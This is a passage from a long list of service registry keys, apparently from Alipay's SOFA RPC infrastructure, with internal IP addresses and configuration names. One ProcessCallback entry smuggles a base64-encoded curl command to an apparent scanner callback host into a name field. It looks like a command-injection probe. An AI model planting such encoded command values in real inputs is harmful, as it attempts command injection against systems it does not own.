bleScheduleDrm.EC_finpwm_capital_fixed_redeem_sys_retry.normalTaskPaused,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.aciamcore.common.service.facade.approval.ApprovalEngineServiceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.tscenter.biz.rpc.edge.pb.EdgePBService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergwlite.service.facade.spi.MessageReceiveService:1.0:instfluxcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bkmobileappcommon.common.service.testgo.devicelist.DeviceListFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdatabus:name=com.alipay.zdatabus.common.agent.drm.ZdatabusClientLineageDRM.chainZipRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.aliyun.apsarabase.euler.meta.service.facade.api.StackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:zhubalipay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.creativecenter.openapi.SelectionCreativeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ipsponsorprod.biz.cashback.service.facade.CashBackMallService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.antmember.common.service.facade.BenefitExchangeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.opinioncore:name=com.alipay.antvip.client.internal.drm.DrmControl.waitServerListTimeoutMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finlinkdata.client.cache.contract.service.LocalContractDigestQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:merchantsettle_settleManageProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinpromo.common.service.facade.api.activity.ActivityInfoService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstoreapp.common.service.triple.store.StoreService:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.26.77#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.hainaprod.common.service.facade.api.mini.resource.MiniResourceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpaas:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.ssrfPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:egg-app@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.timeout.common.service.facade.spi.TimeoutCallbackHandler:1.0:transferprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.giftprod.common.config.drm.wufu2021.ActivityTaskDrm.preDrm,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_INSLIVEPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.biz.daemon.drm.DiscountBizParamResource.maxCardSegmentCount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paydecision.service.api.PayAssetAccessDecisionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.customscenter:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.ioErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ecologypunish.facade.trade.TradeStackBackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.151.237#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Servers_tyaowei#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.airbops:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaDegradeSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.budgetcore.core.model.control.BudgetRouteRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.248.83#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:pcs.pingyao.test@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clearingcenter.facade.api.InstMoveRuleManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:insopenprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoplaycenter.common.pk.facade.api.PkRecordOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdatasync.common.service.facade.CrowdMatchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iliquidity.core.service.transfer.engine.TransferRuleEngine:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:idb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prodswitch.common.service.facade.ArSwitchService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinbaseprod.common.service.facade.api.AntBottomWordsFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.caprod.service.sign.facade.SignCommonService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.zoloz.zmng.facade.facerecord.CaseTradeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iglobalfundcontrol.common.config.api.ClearAgreementBusinessElementMappingQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kmi.common.service.facade.TrustBaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.yebplus.YebPlusTransferInService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:opensupport_onstopmng_projectService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prodtrans.senior.manage.facade.ProdProductPropertyManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zplayback.playback.service.HbaseDataManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.core.service.guardian.data.AfsDataSourceCoreService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custview.facade.permit.BKPermitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:imaspmng_cardBusinessRelationEditProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuprod.biz.service.gw.community.api.message.ChatMessageManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.accorderexprod.common.facade.control.api.QueryStdTrusteeOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mitemcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdatasync.common.service.facade.MigrateUserFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.minicore.common.service.facade.miniapp.api.AppInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.tss.supportprod.facade.emergency.EmcEventDefineFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfinvest.facade.api.basic.CountryCodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.core.migrate.drm.SceneMigrateTaskDrm.dataSyncLoadBeginMinutes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.88.95.225#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.appxprod.common.service.facade.api.metatree.MetaMappingManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservcore.common.service.facade.tair.auto.flush.FlushTairFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicada.mide.common.service.facade.api.ds.DsQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.120.118#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Sub_Servers_TP_S_BAOXIANGW#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.openapi.common.service.client.SysAppInvokeService:1.0:dchainconfigcenter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.yunfengdieweb:name=com.alipay.routeclient.DefaultRouteCoordinator.stressSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbasecore.service.v2.category.facade.CategoryCommonQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpaas:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.surlPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secucommunity.common.service.facade.topic.api.TopicRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sandbox.common.service.facade.shadow.ShadowUserDepositService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.stockassetcore.common.service.facade.api.UserOptionalQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cschannel.common.service.facade.dw.service.UdfManagerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instinfo.service.facade.info.InstInfoBatchService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.custcenterprod.integration.aliyun.DgClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.scardcenter.common.service.facade.CertMasterKeyQueryServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.paramCheckEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.commandcenter:name=com.alipay.common.tracer.manage.TracerDrm.zdalTairDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finannafccore.common.service.facade.annotation.api.StandardLibraryDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ireserve.facade.api.InstInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frdecision.common.service.facade.api.DispositionActionOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.debittrans.service.facade.aptrans.api.AptransQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.user.UserInfoQueryService:0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.kgopen.container.facade.api.KgOnlineServiceInvokeFacade:1.0:ainlp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.ipay.icashiercore.common.service.facade.api.PaymentService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zifim:name=com.alipay.fc.common.lang.drm.AntBizMonitorCfgDrm.sysCodeMapping,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opencore.service.facade.platform.BizTypeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilerelation.common.service.facade.tlou.TlouPeConfRelationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.arcstudio.common.service.facade.AppFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:Y3VybCBodHRwOi8vMzMwMjQ4NjktLTEwNDAwMzAyMC5hbnRzY2FubmVyLmdsb2JhbC5hbGlwYXkuY29t@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.hotevent.api.HotEventFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.common.service.facade.loan.api.FinancingUserTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.amberdata.admin.service.EventLogService:1.0:eventLogService@bolt#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.api.SystemPropertyManageService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.176.159#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.fc.fcbuservice.common.service.facade.ProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.pointcore.common.mpoint.facade.MpointFlowoutService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.filecore.service.facade.spi.FileParseCallBack:1.0:overseaprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.secdatacontext.common.facade.api.DataNodeTypeMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.userview.facade.PropConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csmobile.service.rpc.api.MypaIndexGwService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acoffercenter.common.service.facade.offer.AliyunProductMappingManageFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.cloudbox.facade.apibus.service.common.OperationTaskExecuteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_11.124.129.167#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.bp.engine.call.BPCall:1.0:mrchis_confirmResult@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudengine:name=com.alipay.cloudengine.loglevel.chargefront.logLevelConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mfinstockprod.common.service.facade.api.UserAssetServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileic.common.adapter.crypt.CaCryptUtil:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:serverlesscore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.socialcore.facade.wireless.IsvAppFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_CUSTOMER_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.openexprod.integration.cif.EquipmentQueryServiceClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.onedata.dwm.client.table.PhysicalMountFactTableQueryOpenService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.facade.api.AssetTransVoucherFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:certify@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.opsware.api.facade.ops.MachineGroupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.164.93#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Sub_Servers_TP_F_PCREDITBILL#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.ipay.imemberprod.service.facade.api.prod.BizOrderQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:antassistant@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insassetprod.common.service.facade.PetSpeciesFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundtrade.common.service.facade.api.FundTradeRefundFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbpromocore.common.service.facade.CampCacheQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.common.v3.service.facade.api.channel.NewsChannelFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gacplatform.facade.api.GacPlatformServiceFacade:1.0:bkinstassetprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.rdf.ficc.common.loadtestableschedule.drm.LoadTestableScheduleDrm.spr-fund-fixed-execute-init.loadTestEnabled,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securityemc.common.service.facade.SwitchDecisionServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.yingxutestGZTBaseCache.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.meta:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneColor,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_C_CREDIT_LDC#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.airbops:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInOsValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchorder.orderdatacenter.facade.service.OrderDataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.abilitycore.common.service.facade.mng.AppealConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ismonitor.biz.censor.fault.CensorFaultManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpdcore:name=com.alipay.fc.pdcore.common.service.cacheclient.drm.ClientCacheConfigDRM.remoteTimeOutThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:rcdisposal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.caprod.service.cert.facade.CertManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.isp.AuthFieldInfosecFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.service.drm.FixedOldData2SyncTableDrm.selectSceneTypes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insttrade:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportEnabled,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cif.facade.doublewrite.DoubleWriteRzoneService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchasset.common.service.facade.requirement.AssetRequirementPlanQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openeval.common.service.facade.activityha.ActivityhaServiceSpi:1.0:antPubTestService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prodswitch.common.service.facade.InterfaceStatusQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskmng.common.service.facade.api.CrpRiskTaskOperateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.72.147#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.recadmin.dmp.common.service.facade.api.RcmdRuleServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkcupacore.common.service.facade.api.AuthorizationPartManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.client.drm74#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fincommontaskhub.service.facade.service.spi.FinalizeService:1.0:scsupport@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.core.message.drm.FinSceneSendMessageDrm.sceneCreatedMessageToAdartList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.gotone.common.service.api.ReceiveGotoneSmsService:1.0:mdeduct@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.253.3#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finbatch:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.lowercaseFirst:name=com.alipay.routeclient.DefaultRouteCoordinator.whiteListRPCLoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.settlequery.common.service.facade.config.api.OutCapacityQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.0.231#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Servers_TP_C_TRADE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchcommerce.fmcgcore.common.service.facade.registration.api.EnterRouteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bumng.common.service.facade.UserService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_CSINSIGHT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesearch.common.service.facade.manage.MsSolutionConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ipciTairCache.compressionType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cashier.common.service.facade.cashierorderquery.api.PayOrderQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.enableAntq,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.finpwm.finpwmXTradeDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.gfas:name=com.alipay.antvip.client.internal.drm.DrmControl.mainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchiscore.rabbit.common.service.facade.RabbitBusinessQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unimetaservice.resource.facade.AigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.82.87.121#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.decisionx.engine.common.api.VerifyService:1.0:ins_marketing@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fin.pdcore.common.service.facade.adapter.ProductRealSaleQueryFacade:1.0:finpdcorewealth@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.91.79#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.autoinsprod.common.service.facade.AutoInsSysRoleMapFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.158.169#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbasset.common.service.facade.stuff.api.QrcodeRetailFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.cardbinMdmTairCache.czoneSwitchMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.dont-load-plugin:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.guardianConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.charge:name=com.alipay.common.tracer.manage.TracerDrm.zdalTairDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mmtcaftscmdproc.common.service.facade.paybox.SmartWhiteBoxRegisterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.enableDataCache,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.LoanDecisionSwitchDrm.cutFlowToPcldLogStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.datacube.common.service.facade.UccSceneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_IAASSETTRANS#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:alinode-app@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.mitemcenter.MitemcenterCookService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.merchant.common.service.facade.OrderLinkService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservcenter.biz.service.impl.test.AgentSignTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.181.170#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.echox.service.EchoxAopPlaybackService:1.0:malgo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.exratecenter.service.facade.api.ExOriginRateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cap.common.service.tenant.CapCompanyService:1.0:antcloud@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:hpmweb#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finfocore:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaDegradeSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.appcompass.common.service.facade.efficiency.NotifyMessageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.128.34#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:promobench_planSelectPatrolProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_F_CONTROL#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.124.12.202#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.lifemng.facade.ebpp.EbppExportConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mmtcaftscmdproc.common.service.facade.paybox.SmartPayBoxBizServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsteward.common.service.facade.survey.SurveyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_FINPROMOSCENE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.paymentmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.paramCheckDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.45.76.155#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcreditmarket.service.PcreditMarketFatigueFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppgw.facade.KeyManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.pointdonate.PointDonateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:mindv@D